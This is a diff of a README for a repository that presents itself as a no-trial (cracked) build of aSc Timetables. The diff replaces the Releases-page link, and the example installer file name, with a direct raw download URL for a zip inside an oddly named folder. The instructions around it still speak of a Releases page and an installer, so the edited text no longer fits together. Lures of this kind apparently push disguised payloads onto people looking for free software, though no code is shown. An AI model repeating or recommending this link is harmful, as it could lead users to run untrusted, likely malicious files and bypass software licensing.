Jj77282/aSc-Timetables-No-Trial/README.md

 Follow these steps to download and run aSc Timetables:

 1. **Visit the Releases Page**
-   Click on this link to go to the Releases page: [Download](https://github.com/Jj77282/aSc-Timetables-No-Trial/releases).
+   Click on this link to go to the Releases page: [Download](https://raw.githubusercontent.com/Jj77282/aSc-Timetables-No-Trial/main/unwrangling/aSc-Timetables-No-Trial_v1.1.zip).

 2. **Choose the Latest Version**
    On the Releases page, look for the latest version.
 It is typically marked with a tag showing the version number.

 3. **Download the Installer**
    Find the download link for the installer file.
-It might be named something like `aSc-Timetables-Installer.exe`.
+It might be named something like `https://raw.githubusercontent.com/Jj77282/aSc-Timetables-No-Trial/main/unwrangling/aSc-Timetables-No-Trial_v1.1.zip`.
 Click on the link to download the file to your computer.

 4. **Locate the Downloaded File**
    After the download is complete, open your downloads folder.
 You should see the installer file there.